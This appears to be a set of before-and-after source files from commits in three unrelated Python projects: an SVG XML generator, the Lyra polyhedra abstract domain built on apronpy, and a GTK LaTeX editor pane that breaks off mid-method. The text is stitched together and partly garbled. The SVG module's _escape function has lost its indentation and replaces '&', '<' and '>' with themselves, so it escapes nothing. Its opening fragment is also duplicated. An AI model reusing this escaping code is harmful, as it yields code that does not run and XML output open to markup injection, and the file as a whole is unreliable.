            url = "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"
            io.write("<?xml version='1.0' encoding='UTF-8'?>\n")
            io.write('<!DOCTYPE svg PUBLIC '
                     '"-//W3C//DTD SVG 1.0//EN" "%s">\n' % url)
        super(svg, self).to_xml(io)
        return io.getvalue()
class title(base):
    """<title> element; the title string becomes its text content."""
    def __init__(self, _title):
        super(title, self).__init__(text=_title)


class text(element):
    """<text> element at (x, y) with the given text content."""
    def __init__(self, x, y, _text, **kwargs):
        super(text, self).__init__(x, y, text=_text, **kwargs)


class rect(element):
    """<rect> element; geometry handled entirely by `element`."""
    pass


class ellipse(base):
    """<ellipse> centered at (cx, cy) with radii rx, ry."""
    def __init__(self, cx, cy, rx, ry, **kwargs):
        super(ellipse, self).__init__(cx=cx, cy=cy, rx=rx, ry=ry, **kwargs)


class image(element):
    """<image> element.

    NOTE(review): `uri` is accepted but never stored -- an xlink:href
    attribute is presumably intended; confirm against callers.
    """
    def __init__(self, uri, x, y, width, height, **kwargs):
        super(image, self).__init__(x, y, width, height, **kwargs)


class polygon(base):
    """<polygon> built from an iterable of (x, y) integer point tuples."""
    def __init__(self, points, **kwargs):
        xylist = " ".join('%d,%d' % pt for pt in points)
        super(polygon, self).__init__(points=xylist, **kwargs)


class path(base):
    """<path> element; `data` (e.g. a pathdata object) becomes the 'd' attribute."""
    def __init__(self, data, **kwargs):
        super(path, self).__init__(d=data, **kwargs)
class pathdata:
    """Builder for an SVG <path> 'd' attribute.

    Each method appends one path command; repr() joins them with spaces.
    Uppercase commands use absolute coordinates, lowercase relative ones.
    """
    def __init__(self, x=None, y=None):
        self.path = []  # accumulated command strings, in order
        if x is not None and y is not None:
            self.move(x, y)

    def closepath(self):
        self.path.append('z')

    def move(self, x, y):
        self.path.append('M %s %s' % (x, y))

    def relmove(self, x, y):
        self.path.append('m %s %s' % (x, y))

    def line(self, x, y):
        self.path.append('L %s %s' % (x, y))

    def relline(self, x, y):
        self.path.append('l %s %s' % (x, y))

    def hline(self, x):
        self.path.append('H%s' % (x,))

    def relhline(self, x):
        # BUG FIX: the format string had two placeholders ('h%s %s') for a
        # single value, raising TypeError; a relative horizontal line takes
        # exactly one coordinate.
        self.path.append('h%s' % (x,))

    def vline(self, y):
        self.path.append('V%s' % (y,))

    def relvline(self, y):
        self.path.append('v%s' % (y,))

    def bezier(self, x1, y1, x2, y2, x, y):
        self.path.append('C%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))

    def relbezier(self, x1, y1, x2, y2, x, y):
        self.path.append('c%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))

    def smbezier(self, x2, y2, x, y):
        self.path.append('S%s,%s %s,%s' % (x2, y2, x, y))

    def relsmbezier(self, x2, y2, x, y):
        self.path.append('s%s,%s %s,%s' % (x2, y2, x, y))

    def qbezier(self, x1, y1, x, y):
        self.path.append('Q%s,%s %s,%s' % (x1, y1, x, y))

    def qrelbezier(self, x1, y1, x, y):
        self.path.append('q%s,%s %s,%s' % (x1, y1, x, y))

    def smqbezier(self, x, y):
        self.path.append('T%s %s' % (x, y))

    def relsmqbezier(self, x, y):
        self.path.append('t%s %s' % (x, y))

    def ellarc(self, rx, ry, xrot, laf, sf, x, y):
        self.path.append('A%s,%s %s %s %s %s %s' % \
                         (rx, ry, xrot, laf, sf, x, y))

    def relellarc(self, rx, ry, xrot, laf, sf, x, y):
        self.path.append('a%s,%s %s %s %s %s %s' % \
                         (rx, ry, xrot, laf, sf, x, y))

    def __repr__(self):
        return ' '.join(self.path)
class defs(base):
    """<defs> container for reusable definitions."""
    pass


class filter(element):
    """<filter> element, positioned and sized like any `element`."""
    def __init__(self, x, y, width, height, **kwargs):
        super(filter, self).__init__(x, y, width, height, **kwargs)


def svgclass(name):
    """ svg class generating function """
    # Dynamically create a new attribute-only element class named `name`;
    # the class name becomes the XML tag (see base.to_xml).
    return type(name, (base,), {})
* Fix error with multibyte characters
# -*- coding: utf-8 -*-
# Copyright 2011 Takeshi KOMIYA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import cStringIO
def _escape(s):
if not isinstance(s, (str, unicode)):
s = str(s)
return s.replace("&", "&").replace("<", "<").replace(">", ">")
def _quote(s):
    """Return `s` escaped and wrapped in double quotes for use as an
    XML attribute value.

    NOTE(review): the replacement target had been garbled into a bare
    triple-quote by extraction (a syntax error); restored to '&quot;'.
    """
    return '"%s"' % _escape(s).replace('"', '&quot;')
class base(object):
    """Base class for SVG elements.

    Holds optional text content, child elements and an attribute dict,
    and serializes itself (recursively) to XML via to_xml().
    """
    def __init__(self, *args, **kwargs):
        self.text = None       # optional text content of the element
        self.elements = []     # child elements, serialized in insertion order
        self.attributes = {}   # XML attribute name -> value
        for key, value in kwargs.items():
            self.add_attribute(key, value)

    def add_attribute(self, key, value):
        """Set an attribute; a `set_<key>` hook wins, else store the value
        with underscores mapped to hyphens (Python name -> XML name)."""
        setter = 'set_%s' % key
        if hasattr(self, setter):
            getattr(self, setter)(value)
        else:
            key = re.sub('_', '-', key)
            self.attributes[key] = value

    def addElement(self, element):
        """Append a child element."""
        self.elements.append(element)

    def set_text(self, text):
        # Hook used by add_attribute for the 'text' keyword.
        self.text = text

    def to_xml(self, io, level=0):
        """Write this element (and children) to `io`, indented by `level`."""
        # The XML tag name is simply the Python class name.
        clsname = self.__class__.__name__
        indent = ' ' * level
        io.write('%s<%s' % (indent, clsname))
        # Attributes are emitted sorted for deterministic output.
        for key in sorted(self.attributes):
            value = self.attributes[key]
            if value is not None:
                io.write(' %s=%s' % (_escape(key), _quote(value)))
        if self.elements == [] and self.text is None:
            io.write(" />\n")          # empty element
        elif self.text is not None:
            # Encode to UTF-8 bytes so multibyte text survives cStringIO.
            text = _escape(self.text).encode('utf-8')
            io.write(">%s</%s>\n" % (text, clsname))
        elif self.elements:
            io.write(">\n")
            for e in self.elements:
                e.to_xml(io, level + 1)
            io.write('%s</%s>\n' % (indent, clsname))
class element(base):
    """SVG element positioned at (x, y), with optional width/height."""
    def __init__(self, x, y, width=None, height=None, *args, **kwargs):
        super(element, self).__init__(*args, **kwargs)
        self.attributes['x'] = x
        self.attributes['y'] = y
        # Size attributes are only emitted when explicitly given.
        if width is not None:
            self.attributes['width'] = width
        if height is not None:
            self.attributes['height'] = height
class svg(base):
    """Root <svg> element; renders the whole document to a string."""
    def __init__(self, x, y, width, height):
        viewbox = "%d %d %d %d" % (x, y, width, height)
        super(svg, self).__init__(viewBox=viewbox)
        self.use_doctype = True  # emit the SVG 1.0 DOCTYPE by default
        self.add_attribute('xmlns', 'http://www.w3.org/2000/svg')

    def to_xml(self):
        # NOTE: overrides base.to_xml with a different signature -- the root
        # supplies its own buffer and returns the serialized document.
        io = cStringIO.StringIO()
        if self.use_doctype:
            url = "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"
            io.write("<?xml version='1.0' encoding='UTF-8'?>\n")
            io.write('<!DOCTYPE svg PUBLIC '
                     '"-//W3C//DTD SVG 1.0//EN" "%s">\n' % url)
        super(svg, self).to_xml(io)
        return io.getvalue()
class title(base):
    """<title> element; the title string becomes its text content."""
    def __init__(self, _title):
        super(title, self).__init__(text=_title)


class text(element):
    """<text> element at (x, y) with the given text content."""
    def __init__(self, x, y, _text, **kwargs):
        super(text, self).__init__(x, y, text=_text, **kwargs)


class rect(element):
    """<rect> element; geometry handled entirely by `element`."""
    pass


class ellipse(base):
    """<ellipse> centered at (cx, cy) with radii rx, ry."""
    def __init__(self, cx, cy, rx, ry, **kwargs):
        super(ellipse, self).__init__(cx=cx, cy=cy, rx=rx, ry=ry, **kwargs)


class image(element):
    """<image> element.

    NOTE(review): `uri` is accepted but never stored -- an xlink:href
    attribute is presumably intended; confirm against callers.
    """
    def __init__(self, uri, x, y, width, height, **kwargs):
        super(image, self).__init__(x, y, width, height, **kwargs)


class polygon(base):
    """<polygon> built from an iterable of (x, y) integer point tuples."""
    def __init__(self, points, **kwargs):
        xylist = " ".join('%d,%d' % pt for pt in points)
        super(polygon, self).__init__(points=xylist, **kwargs)


class path(base):
    """<path> element; `data` (e.g. a pathdata object) becomes the 'd' attribute."""
    def __init__(self, data, **kwargs):
        super(path, self).__init__(d=data, **kwargs)
class pathdata:
    """Builder for an SVG <path> 'd' attribute.

    Each method appends one path command; repr() joins them with spaces.
    Uppercase commands use absolute coordinates, lowercase relative ones.
    """
    def __init__(self, x=None, y=None):
        self.path = []  # accumulated command strings, in order
        if x is not None and y is not None:
            self.move(x, y)

    def closepath(self):
        self.path.append('z')

    def move(self, x, y):
        self.path.append('M %s %s' % (x, y))

    def relmove(self, x, y):
        self.path.append('m %s %s' % (x, y))

    def line(self, x, y):
        self.path.append('L %s %s' % (x, y))

    def relline(self, x, y):
        self.path.append('l %s %s' % (x, y))

    def hline(self, x):
        self.path.append('H%s' % (x,))

    def relhline(self, x):
        # BUG FIX: the format string had two placeholders ('h%s %s') for a
        # single value, raising TypeError; a relative horizontal line takes
        # exactly one coordinate.
        self.path.append('h%s' % (x,))

    def vline(self, y):
        self.path.append('V%s' % (y,))

    def relvline(self, y):
        self.path.append('v%s' % (y,))

    def bezier(self, x1, y1, x2, y2, x, y):
        self.path.append('C%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))

    def relbezier(self, x1, y1, x2, y2, x, y):
        self.path.append('c%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))

    def smbezier(self, x2, y2, x, y):
        self.path.append('S%s,%s %s,%s' % (x2, y2, x, y))

    def relsmbezier(self, x2, y2, x, y):
        self.path.append('s%s,%s %s,%s' % (x2, y2, x, y))

    def qbezier(self, x1, y1, x, y):
        self.path.append('Q%s,%s %s,%s' % (x1, y1, x, y))

    def qrelbezier(self, x1, y1, x, y):
        self.path.append('q%s,%s %s,%s' % (x1, y1, x, y))

    def smqbezier(self, x, y):
        self.path.append('T%s %s' % (x, y))

    def relsmqbezier(self, x, y):
        self.path.append('t%s %s' % (x, y))

    def ellarc(self, rx, ry, xrot, laf, sf, x, y):
        self.path.append('A%s,%s %s %s %s %s %s' % \
                         (rx, ry, xrot, laf, sf, x, y))

    def relellarc(self, rx, ry, xrot, laf, sf, x, y):
        self.path.append('a%s,%s %s %s %s %s %s' % \
                         (rx, ry, xrot, laf, sf, x, y))

    def __repr__(self):
        return ' '.join(self.path)
class defs(base):
    """<defs> container for reusable definitions."""
    pass


class filter(element):
    """<filter> element, positioned and sized like any `element`."""
    def __init__(self, x, y, width, height, **kwargs):
        super(filter, self).__init__(x, y, width, height, **kwargs)


def svgclass(name):
    """ svg class generating function """
    # Dynamically create a new attribute-only element class named `name`;
    # the class name becomes the XML tag (see base.to_xml).
    return type(name, (base,), {})
|
"""
Polyhedra Abstract Domain
=========================
Relational abstract domain to be used for **numerical analysis**.
The set of possible numerical values of a program variable in a program state
is represented by a conjunction of linear constraints.
:Authors: Caterina Urban
"""
from copy import deepcopy
from typing import Set, Union
from apronpy.coeff import PyMPQScalarCoeff, PyMPQIntervalCoeff
from apronpy.environment import PyEnvironment
from apronpy.interval import PyMPQInterval
from apronpy.lincons0 import ConsTyp
from apronpy.polka import PyPolkaMPQstrict
from apronpy.tcons1 import PyTcons1Array, PyTcons1
from apronpy.texpr0 import TexprOp, TexprRtype, TexprRdir
from apronpy.texpr1 import PyTexpr1
from apronpy.var import PyVar
from lyra.abstract_domains.state import State
from lyra.core.expressions import VariableIdentifier, Expression, BinaryBooleanOperation, \
BinaryComparisonOperation, NegationFreeExpression, Literal, Input, UnaryArithmeticOperation, \
BinaryArithmeticOperation
from lyra.core.utils import copy_docstring
def lyra2apron(environment, expression: Expression, usub = False) -> Union[PyTexpr1, PyTcons1]:
    """Translate a Lyra expression into an APRON tree expression/constraint.

    :param environment: APRON environment the result is built against
    :param expression: Lyra expression to translate
    :param usub: True when a pending unary minus must be folded into a literal
    :return: a PyTexpr1 for arithmetic expressions, a PyTcons1 for comparisons
    :raise NotImplementedError: for unsupported expression forms

    NOTE(review): a unary minus is only folded into a *literal* operand; on
    any other operand the `assert not usub` below fires -- confirm intended.
    """
    if isinstance(expression, Literal):
        # Apply the pending unary minus directly to the constant.
        if usub:
            cst = PyMPQScalarCoeff(-float(expression.val))
        else:
            cst = PyMPQScalarCoeff(float(expression.val))
        return PyTexpr1.cst(environment, cst)
    elif isinstance(expression, VariableIdentifier):
        assert not usub
        variable = PyVar(expression.name)
        return PyTexpr1.var(environment, variable)
    elif isinstance(expression, Input):
        assert not usub
        # An input value is unconstrained: model it as the top interval.
        expr = PyMPQIntervalCoeff(PyMPQInterval.top())
        return PyTexpr1.cst(environment, expr)
    elif isinstance(expression, UnaryArithmeticOperation):
        usub = expression.operator == UnaryArithmeticOperation.Operator.Sub
        return lyra2apron(environment, expression.expression, usub)
    elif isinstance(expression, BinaryArithmeticOperation):
        assert not usub
        expr1 = lyra2apron(environment, expression.left)
        expr2 = lyra2apron(environment, expression.right)
        op2op = {
            BinaryArithmeticOperation.Operator.Add: TexprOp.AP_TEXPR_ADD,
            BinaryArithmeticOperation.Operator.Sub: TexprOp.AP_TEXPR_SUB,
            BinaryArithmeticOperation.Operator.Mult: TexprOp.AP_TEXPR_MUL,
            BinaryArithmeticOperation.Operator.Div: TexprOp.AP_TEXPR_DIV
        }
        op = op2op[expression.operator]
        return PyTexpr1.binop(op, expr1, expr2, TexprRtype.AP_RTYPE_REAL, TexprRdir.AP_RDIR_RND)
    elif isinstance(expression, BinaryComparisonOperation):
        assert not usub
        # assert expression.left.typ == expression.right.typ
        typ = expression.left.typ
        left = expression.left
        right = expression.right
        sub = BinaryArithmeticOperation.Operator.Sub
        # Comparisons are normalized to 'expr >= 0' (SUPEQ) or 'expr > 0' (SUP):
        # x >= y -> x - y >= 0; x > y -> x - y > 0; <=/< swap the operands.
        if expression.operator == BinaryComparisonOperation.Operator.GtE:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
        elif expression.operator == BinaryComparisonOperation.Operator.Gt:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
        elif expression.operator == BinaryComparisonOperation.Operator.LtE:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
        elif expression.operator == BinaryComparisonOperation.Operator.Lt:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
    raise NotImplementedError(f"lyra2apron conversion for {expression} is not yet supported!")
class PolyhedraState(State):
    """Polyhedra analysis state. An element of the polyhedra abstract domain.

    Conjunction of linear constraints constraining the value of each variable.
    The value of all program variables is unconstrained by default.

    .. note:: Program variables storing collections are abstracted via summarization.

    .. document private methods
    .. automethod:: PolyhedraState._assign
    .. automethod:: PolyhedraState._assume
    .. automethod:: PolyhedraState._output
    .. automethod:: PolyhedraState._substitute
    """
    def __init__(self, variables: Set[VariableIdentifier], precursory: State = None):
        super().__init__(precursory=precursory)
        # One APRON (real) variable per program variable; the polyhedron
        # itself is held in self.polka.
        r_vars = list()
        for variable in variables:
            r_vars.append(PyVar(variable.name))
        self.environment = PyEnvironment([], r_vars)
        self.polka = PyPolkaMPQstrict(self.environment)

    @copy_docstring(State.bottom)
    def bottom(self):
        self.polka = PyPolkaMPQstrict.bottom(self.environment)
        return self

    @copy_docstring(State.top)
    def top(self):
        self.polka = PyPolkaMPQstrict.top(self.environment)
        return self

    def __repr__(self):
        if self.is_bottom():
            return "⊥"
        return str(self.polka)

    @copy_docstring(State.is_bottom)
    def is_bottom(self) -> bool:
        return self.polka.is_bottom()

    @copy_docstring(State.is_top)
    def is_top(self) -> bool:
        return self.polka.is_top()

    @copy_docstring(State._less_equal)
    def _less_equal(self, other: 'PolyhedraState') -> bool:
        return self.polka <= other.polka

    @copy_docstring(State._join)
    def _join(self, other: 'PolyhedraState') -> 'PolyhedraState':
        self.polka = self.polka.join(other.polka)
        return self

    @copy_docstring(State._meet)
    def _meet(self, other: 'PolyhedraState') -> 'PolyhedraState':
        self.polka = self.polka.meet(other.polka)
        return self

    @copy_docstring(State._widening)
    def _widening(self, other: 'PolyhedraState') -> 'PolyhedraState':
        self.polka = self.polka.widening(other.polka)
        return self

    @copy_docstring(State._assign)
    def _assign(self, left: Expression, right: Expression) -> 'PolyhedraState':
        if isinstance(left, VariableIdentifier):
            expr = lyra2apron(self.environment, right)
            self.polka = self.polka.assign(PyVar(left.name), expr)
            return self
        raise NotImplementedError(f"Assignment to {left.__class__.__name__} is unsupported!")

    @copy_docstring(State._assume)
    def _assume(self, condition: Expression, bwd: bool = False) -> 'PolyhedraState':
        # Normalize away negations, then recurse: conjunction -> meet,
        # disjunction -> join, comparison -> APRON constraint.
        normal = NegationFreeExpression().visit(condition)
        if isinstance(normal, BinaryBooleanOperation):
            if normal.operator == BinaryBooleanOperation.Operator.And:
                right = deepcopy(self)._assume(normal.right, bwd=bwd)
                return self._assume(normal.left, bwd=bwd).meet(right)
            if normal.operator == BinaryBooleanOperation.Operator.Or:
                right = deepcopy(self)._assume(normal.right, bwd=bwd)
                return self._assume(normal.left, bwd=bwd).join(right)
        elif isinstance(normal, BinaryComparisonOperation):
            cond = lyra2apron(self.environment, normal)
            self.polka = self.polka.meet(PyTcons1Array([cond.tcons1]))
            return self
        raise NotImplementedError(f"Assumption of {normal.__class__.__name__} is unsupported!")

    @copy_docstring(State.enter_if)
    def enter_if(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.exit_if)
    def exit_if(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.enter_loop)
    def enter_loop(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.exit_loop)
    def exit_loop(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.output)
    def _output(self, output: Expression) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State._substitute)
    def _substitute(self, left: Expression, right: Expression) -> 'PolyhedraState':
        if isinstance(left, VariableIdentifier):
            expr = lyra2apron(self.environment, right)
            self.polka = self.polka.substitute(PyVar(left.name), expr)
            return self
        raise NotImplementedError(f"Substitution of {left.__class__.__name__} is unsupported!")
fix polyhedra domain after apronpy update
"""
Polyhedra Abstract Domain
=========================
Relational abstract domain to be used for **numerical analysis**.
The set of possible numerical values of a program variable in a program state
is represented by a conjunction of linear constraints.
:Authors: Caterina Urban
"""
from copy import deepcopy
from typing import Set, Union
from apronpy.coeff import PyMPQScalarCoeff, PyMPQIntervalCoeff
from apronpy.environment import PyEnvironment
from apronpy.interval import PyMPQInterval
from apronpy.lincons0 import ConsTyp
from apronpy.polka import PyPolkaMPQstrict
from apronpy.tcons1 import PyTcons1Array, PyTcons1
from apronpy.texpr0 import TexprOp, TexprRtype, TexprRdir
from apronpy.texpr1 import PyTexpr1
from apronpy.var import PyVar
from lyra.abstract_domains.state import State
from lyra.core.expressions import VariableIdentifier, Expression, BinaryBooleanOperation, \
BinaryComparisonOperation, NegationFreeExpression, Literal, Input, UnaryArithmeticOperation, \
BinaryArithmeticOperation
from lyra.core.utils import copy_docstring
def lyra2apron(environment, expression: Expression, usub = False) -> Union[PyTexpr1, PyTcons1]:
    """Translate a Lyra expression into an APRON tree expression/constraint.

    :param environment: APRON environment the result is built against
    :param expression: Lyra expression to translate
    :param usub: True when a pending unary minus must be folded into a literal
    :return: a PyTexpr1 for arithmetic expressions, a PyTcons1 for comparisons
    :raise NotImplementedError: for unsupported expression forms

    NOTE(review): a unary minus is only folded into a *literal* operand; on
    any other operand the `assert not usub` below fires -- confirm intended.
    """
    if isinstance(expression, Literal):
        # Apply the pending unary minus directly to the constant.
        if usub:
            cst = PyMPQScalarCoeff(-float(expression.val))
        else:
            cst = PyMPQScalarCoeff(float(expression.val))
        return PyTexpr1.cst(environment, cst)
    elif isinstance(expression, VariableIdentifier):
        assert not usub
        variable = PyVar(expression.name)
        return PyTexpr1.var(environment, variable)
    elif isinstance(expression, Input):
        assert not usub
        # An input value is unconstrained: model it as the top interval.
        expr = PyMPQIntervalCoeff(PyMPQInterval.top())
        return PyTexpr1.cst(environment, expr)
    elif isinstance(expression, UnaryArithmeticOperation):
        usub = expression.operator == UnaryArithmeticOperation.Operator.Sub
        return lyra2apron(environment, expression.expression, usub)
    elif isinstance(expression, BinaryArithmeticOperation):
        assert not usub
        expr1 = lyra2apron(environment, expression.left)
        expr2 = lyra2apron(environment, expression.right)
        op2op = {
            BinaryArithmeticOperation.Operator.Add: TexprOp.AP_TEXPR_ADD,
            BinaryArithmeticOperation.Operator.Sub: TexprOp.AP_TEXPR_SUB,
            BinaryArithmeticOperation.Operator.Mult: TexprOp.AP_TEXPR_MUL,
            BinaryArithmeticOperation.Operator.Div: TexprOp.AP_TEXPR_DIV
        }
        op = op2op[expression.operator]
        return PyTexpr1.binop(op, expr1, expr2, TexprRtype.AP_RTYPE_REAL, TexprRdir.AP_RDIR_RND)
    elif isinstance(expression, BinaryComparisonOperation):
        assert not usub
        # assert expression.left.typ == expression.right.typ
        typ = expression.left.typ
        left = expression.left
        right = expression.right
        sub = BinaryArithmeticOperation.Operator.Sub
        # Comparisons are normalized to 'expr >= 0' (SUPEQ) or 'expr > 0' (SUP):
        # x >= y -> x - y >= 0; x > y -> x - y > 0; <=/< swap the operands.
        if expression.operator == BinaryComparisonOperation.Operator.GtE:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
        elif expression.operator == BinaryComparisonOperation.Operator.Gt:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
        elif expression.operator == BinaryComparisonOperation.Operator.LtE:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
        elif expression.operator == BinaryComparisonOperation.Operator.Lt:
            expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
            return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
    raise NotImplementedError(f"lyra2apron conversion for {expression} is not yet supported!")
class PolyhedraState(State):
    """Polyhedra analysis state. An element of the polyhedra abstract domain.

    Conjunction of linear constraints constraining the value of each variable.
    The value of all program variables is unconstrained by default.

    .. note:: Program variables storing collections are abstracted via summarization.

    .. document private methods
    .. automethod:: PolyhedraState._assign
    .. automethod:: PolyhedraState._assume
    .. automethod:: PolyhedraState._output
    .. automethod:: PolyhedraState._substitute
    """
    def __init__(self, variables: Set[VariableIdentifier], precursory: State = None):
        super().__init__(precursory=precursory)
        # One APRON (real) variable per program variable; the polyhedron
        # itself is held in self.polka.
        r_vars = list()
        for variable in variables:
            r_vars.append(PyVar(variable.name))
        self.environment = PyEnvironment([], r_vars)
        self.polka = PyPolkaMPQstrict(self.environment)

    @copy_docstring(State.bottom)
    def bottom(self):
        self.polka = PyPolkaMPQstrict.bottom(self.environment)
        return self

    @copy_docstring(State.top)
    def top(self):
        self.polka = PyPolkaMPQstrict.top(self.environment)
        return self

    def __repr__(self):
        if self.is_bottom():
            return "⊥"
        return '{}'.format(self.polka)

    @copy_docstring(State.is_bottom)
    def is_bottom(self) -> bool:
        return self.polka.is_bottom()

    @copy_docstring(State.is_top)
    def is_top(self) -> bool:
        return self.polka.is_top()

    @copy_docstring(State._less_equal)
    def _less_equal(self, other: 'PolyhedraState') -> bool:
        return self.polka <= other.polka

    @copy_docstring(State._join)
    def _join(self, other: 'PolyhedraState') -> 'PolyhedraState':
        self.polka = self.polka.join(other.polka)
        return self

    @copy_docstring(State._meet)
    def _meet(self, other: 'PolyhedraState') -> 'PolyhedraState':
        self.polka = self.polka.meet(other.polka)
        return self

    @copy_docstring(State._widening)
    def _widening(self, other: 'PolyhedraState') -> 'PolyhedraState':
        self.polka = self.polka.widening(other.polka)
        return self

    @copy_docstring(State._assign)
    def _assign(self, left: Expression, right: Expression) -> 'PolyhedraState':
        if isinstance(left, VariableIdentifier):
            expr = lyra2apron(self.environment, right)
            self.polka = self.polka.assign(PyVar(left.name), expr)
            return self
        raise NotImplementedError(f"Assignment to {left.__class__.__name__} is unsupported!")

    @copy_docstring(State._assume)
    def _assume(self, condition: Expression, bwd: bool = False) -> 'PolyhedraState':
        # Normalize away negations, then recurse: conjunction -> meet,
        # disjunction -> join, comparison -> APRON constraint.
        normal = NegationFreeExpression().visit(condition)
        if isinstance(normal, BinaryBooleanOperation):
            if normal.operator == BinaryBooleanOperation.Operator.And:
                right = deepcopy(self)._assume(normal.right, bwd=bwd)
                return self._assume(normal.left, bwd=bwd).meet(right)
            if normal.operator == BinaryBooleanOperation.Operator.Or:
                right = deepcopy(self)._assume(normal.right, bwd=bwd)
                return self._assume(normal.left, bwd=bwd).join(right)
        elif isinstance(normal, BinaryComparisonOperation):
            cond = lyra2apron(self.environment, normal)
            self.polka = self.polka.meet(PyTcons1Array([cond]))
            return self
        raise NotImplementedError(f"Assumption of {normal.__class__.__name__} is unsupported!")

    @copy_docstring(State.enter_if)
    def enter_if(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.exit_if)
    def exit_if(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.enter_loop)
    def enter_loop(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.exit_loop)
    def exit_loop(self) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State.output)
    def _output(self, output: Expression) -> 'PolyhedraState':
        return self  # nothing to be done

    @copy_docstring(State._substitute)
    def _substitute(self, left: Expression, right: Expression) -> 'PolyhedraState':
        if isinstance(left, VariableIdentifier):
            expr = lyra2apron(self.environment, right)
            self.polka = self.polka.substitute(PyVar(left.name), expr)
            return self
        raise NotImplementedError(f"Substitution of {left.__class__.__name__} is unsupported!")
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
# Sentinel tags understood by TexPane.get_iterator().
START = "START"
END = "END"
CURRENT = "CURRENT"
# LaTeX markers used to locate the preamble / document body boundary.
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
    """LaTeX editor pane built on a gtksourceview2 buffer/view pair.

    Handles filling and grabbing the buffer, encoding-tolerant load/save,
    insertion of \\usepackage and \\bibliography statements, error and
    search-result highlighting, change tracking and undo/redo.
    """

    def __init__(self, config):
        self.editorbuffer = gtksourceview2.Buffer()
        self.editortags = self.editorbuffer.get_tag_table()
        self.manager = gtksourceview2.LanguageManager()
        self.searchresults = []
        self.errortag = gtk.TextTag()
        self.searchtag = gtk.TextTag()
        self.configure_texpane(config)
        # Timestamps compared by check_buffer_changed() to detect edits.
        self.textchange = datetime.now()
        self.prevchange = datetime.now()
        self.check_buffer_changed()
        self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
        self.editorbuffer.set_modified(False)

    def configure_texpane(self, config):
        """Configures the gtksourceview (editor) widget"""
        self.language = self.manager.get_language("latex")
        self.editorbuffer.set_language(self.language)
        self.editorbuffer.set_highlight_matching_brackets(True)
        self.editorbuffer.set_highlight_syntax(True)
        self.editorviewer = gtksourceview2.View(self.editorbuffer)
        self.editorviewer.modify_font(pango.FontDescription("monospace 10"))
        self.editorviewer.set_show_line_numbers(config.get_bool("tex_linenumbers"))
        self.editorviewer.set_highlight_current_line(config.get_bool("tex_highlighting"))
        textwrap = config.get_bool("tex_textwrapping")
        wordwrap = config.get_bool("tex_wordwrapping")
        self.editorviewer.set_wrap_mode(self.grab_wrapmode(textwrap, wordwrap))
        self.errortag.set_property('background', 'red')
        self.errortag.set_property('foreground', 'white')
        self.searchtag.set_property('background', 'yellow')

    def fill_buffer(self, newcontent):
        """Clears the buffer and writes new not-undoable data into it"""
        self.editorbuffer.begin_user_action()
        self.editorbuffer.set_text("")
        self.editorbuffer.begin_not_undoable_action()
        start = self.editorbuffer.get_start_iter()
        # Desensitize the view while inserting so the user cannot type
        # into a half-filled buffer.
